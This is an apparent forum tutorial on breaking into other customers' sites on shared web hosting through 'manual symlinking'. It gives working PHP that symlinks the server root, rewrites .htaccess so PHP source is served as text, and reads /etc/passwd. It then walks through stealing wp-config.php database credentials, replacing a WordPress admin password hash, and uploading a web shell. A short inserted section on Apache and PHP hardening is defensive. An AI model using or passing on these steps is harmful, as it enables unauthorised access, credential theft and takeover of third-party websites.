**Not 100% finished but almost! Enjoy whats here so far**
Also, I mention files that I'm including with this tutorial; they are not available yet, so be patient :)
OK, so today I will be showing you how to do some manual symlinking. The traditional method people use is a symlink shell, which normally tries to symlink via the named.conf file (it reads /etc/named.conf to get the list of domains hosted on the server and then symlinks each of them in turn).
The problem with this is that, more often than not, the server will not let you read that file. So what do you do in this position? That's where this tutorial comes in.
So, I will start this assuming that you have uploaded your shell, uploaded the symlink shell, and hit the named.conf error seen in the following image.
What do you do from here? Well, that's where the fun part begins! To accomplish our symlinking we will need access to the /etc/passwd file. If you do not have shell access, you will need to Google methods of obtaining this file's contents, as I will not cover that part. Instead, I will focus on symlinking the root folder from shell access.
So, to start the process, create a new PHP file on the server (name it whatever you want) and insert the following code. The code is commented so you understand what is going on.
THIS CODE IS SAVED AS s.php IN THE FILE LIST I AM INCLUDING WITH THIS TUTORIAL
PHP Code:
```php
<?php
// Make the "sym" directory; the symlink to / and our own .htaccess go in here.
@mkdir("sym", 0777);

// Directives for sym/.htaccess. "Options all" switches on FollowSymLinks and
// Indexes (directory listings); the AddType/AddHandler lines make Apache hand
// .php and .html files under sym/ back as plain text instead of running them.
$htinfo = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";

// Open (or create) sym/.htaccess. Note: "w" OVERWRITES whatever is in the file already.
$doopen = @fopen("sym/.htaccess", "w");
if ($doopen) {
    // Write the directives above into it and close the handle.
    fwrite($doopen, $htinfo);
    fclose($doopen);
}

// Create the symlink sym/root -> / (the server's root folder).
@symlink("/", "sym/root");

// Location of the linked root folder, used by the check below.
$symroot = "sym/root/";

// Check whether the link exists. If it does not, symlink() was blocked
// (disable_functions, open_basedir, no write permission, ...). FAILED, game over.
if (!file_exists($symroot)) {
    echo "root directory not symlinked";
    exit;
}
// The root folder was found, so the symlink worked. Link straight to /etc/passwd.
echo "root symlink success! Go get 'em tiger<br>";
echo "etc/passwd file: <a href='sym/root/etc/passwd'>View It</a>";
?>
```
Now that you have your new file created, it's time to run it and see whether you can symlink or not. Go to the file's URL in your browser and look at what message you get!
If it was successful, open the /etc/passwd file by clicking the link. If it was not successful, find another site, because you're not going to be using this method here!
Once you have the /etc/passwd file open, duplicate the tab (if you're in Chrome) or just open a new tab to the same file, so that you have two of them open; you will see why soon.
So, once you have the file open, you want to look at where the sites are located for the symlinking. The home directory is the second-to-last field of each /etc/passwd line. Usually the sites are in "/home/USERNAME/public_html", but not always. Look at the following picture; it indicates where you find the path to the websites.
Now, the usual way of working out usernames is to take the first 8 characters of the domain name. BUT! This doesn't always work either. On some servers every username is 8 characters, on some 6, on some they are mixed (like in this example), on some they are full domain names, and so on. Basically, it varies by server.
The following image will show you what I mean, and I will run through some examples.
So yes, sometimes you can guess the username, but not always (this ties into something else I will cover toward the end of the tutorial).
Look at the /etc/passwd file and pick a username. For this tutorial I'm using this line: contento:x:516:517::/home/contento:/bin/bash
So, in the URL of the duplicate /etc/passwd tab, remove "etc/passwd" and replace it with "home/username/public_html/" (here, home/contento/public_html/), like in the example below.
Now, when you hit enter, you will most likely see one of two things: either a list of the files/directories of the website you are trying to symlink (success), or a FORBIDDEN message, which means you can't symlink that site (Apache refused to follow the link into that user's directory, or the directory is not readable by the web server user).
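Why the listing-or-FORBIDDEN outcome depends on the server, and what the fix looks like from the hosting side, as an added note that is not part of the original tutorial. The Apache fragment below is example configuration written for this page, not config from the author's files; the /home path and the account names "attacker" (the account running s.php) and "victim" (the account whose site is being read) are assumptions. The first <Directory> block is the permissive setup the s.php trick relies on; the second is the hardened form that produces the FORBIDDEN result.

```apache
# Added example, not from the original tutorial. Paths and the account names
# "attacker" (runs s.php) and "victim" (owns the site being read) are assumed.

# --- Weak: what s.php needs in order to work ---------------------------------
<Directory /home>
    # FollowSymLinks (included in "All") makes Apache follow attacker's
    # sym/root -> / and from there into /home/victim/public_html.
    Options All
    # AllowOverride All lets attacker's sym/.htaccess switch on Indexes
    # (directory listings) and retype .php as text/plain, so wp-config.php is
    # served as source instead of being executed.
    AllowOverride All
</Directory>

# --- Hardened ----------------------------------------------------------------
<Directory /home>
    # Follow a symlink only when the link and its target have the same owner.
    # sym/root is owned by attacker; /, /etc/passwd and /home/victim/* are not,
    # so every request through the link gets a 403 (the FORBIDDEN seen above).
    Options -FollowSymLinks +SymLinksIfOwnerMatch -Indexes
    # Keep "Options" out of reach of .htaccess (and with it FollowSymLinks and
    # Indexes); allow only what applications actually need, such as mod_rewrite
    # rules (FileInfo) and password protection (AuthConfig, Limit).
    AllowOverride AuthConfig FileInfo Limit
</Directory>
```

Whether sym/root can be created at all is decided on the PHP side: with mod_php running every customer's code as the same web-server user, symlink() succeeds for anyone, so `disable_functions = symlink` and a per-vhost `open_basedir` (which PHP applies to symlink() targets as well as to reads) take the primitive away. The Apache options are a per-request check rather than a filesystem boundary; the durable fix on a shared host is running each customer's PHP as their own user (suPHP or per-user php-fpm pools) with home directories that are not world-readable, or a per-tenant jail such as CloudLinux CageFS, so that /home/victim/public_html/wp-config.php is simply not readable by the process running attacker's s.php.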
You have now successfully symlinked the website, so let's get us a shell. *NOTE* You need a good idea of what you're after. I mainly go for WordPress/Joomla/forums, as they have file upload abilities in their admin panels. Cart software and such I skip over, as it's too much trouble to try to shell.
Let's assume it's a WordPress site, like this example. On the page that lists the folders/files, click on wp-config.php. Because the .htaccess written by s.php serves .php files as plain text, you will see the contents of the file, including the database connection details (DB_NAME, DB_USER, DB_PASSWORD, DB_HOST and the $table_prefix).
It should look like this:
Now, go back to your shell and upload a database connector script (database.php in the included files).
Use the connection details from wp-config.php to connect to the database. Find the wp_users table (the "wp_" part is the $table_prefix from wp-config.php and may differ) and open it; you will see the list of usernames, password hashes, etc. Click edit beside the admin user.
Here, note the "user_login" name and replace the password hash. To create a WordPress hash, visit http://www.insidepro.com/hashes.php?lang=eng, put in your password where it says "Password:" and hit generate.
Scroll down to "MD5(Wordpress)" and copy the hash generated beside it (this is the phpass "portable" format that WordPress stores, starting with $P$). Go back to the DB connection script and replace the admin's password hash with yours. Now press "Edit Data" and go back to the table list. You need to find out what the URL of the website is, so go into the wp_options table and you will see the URL (the siteurl and home rows).
Now go to the URL and enter the login details. You will be in the admin panel, where you upload your shell. There are plenty of tutorials on this, so I won't add that bit here.
CONGRATS! You have now successfully symlinked a server manually!
Now I will go over some other little things that come up with this method, as the above is as simple as it gets, on a good, working server.
For each one I will describe the issue and possible ways around it.
Issue #1
Sometimes you can symlink the root folder but cannot open /etc/passwd in the browser (Apache refuses to serve it through the link), even though the link itself exists. If this is the case, add the following code to s.php inside the PHP block, directly under the @symlink line. It reads the file through PHP instead of through Apache and writes a copy next to the script.
PHP Code:
```php
// Paste inside the existing <?php ... ?> block of s.php, right after the @symlink line.
// Reads /etc/passwd through the link with PHP and copies it to passwd.txt beside s.php.
$efile = @file_get_contents("sym/root/etc/passwd");
if ($efile === false) {
    echo "could not read sym/root/etc/passwd through PHP either";
} else {
    $pfile = fopen('passwd.txt', 'w');
    fwrite($pfile, $efile);
    fclose($pfile);
    echo "<p><a href='passwd.txt'>Passwd.txt</a></p>";
}
```
This creates a passwd.txt file with the /etc/passwd contents in it. From here, you continue symlinking as above, using passwd.txt in place of the /etc/passwd tab.
Issue #2
Sometimes you simply can't get the /etc/passwd file no matter what, but you can still go to home/username/public_html with a correct username. So, I have a workaround for this. What you need first is the IP of the server. Take it from your shell, or use this method.
Copy the domain name, go to http://www.centralops.net and click Domain Dossier. Uncheck the three checked boxes, paste the domain and hit go; it will give you the IP. Next, go to Bing.com and in the search bar type "ip:xxx.xxx.xx.xx" and hit enter, changing the xx's to the IP of course.
After that, Bing will list the domains it has indexed on that server. Take the first 6, 8, etc. characters of each domain and try to symlink them; the listing-versus-FORBIDDEN test above tells you whether a guess was right. Sometimes you will get lucky, sometimes you won't.
I will update this more when I get a chance; work's getting busy, but I wanted to go ahead and share this main part <3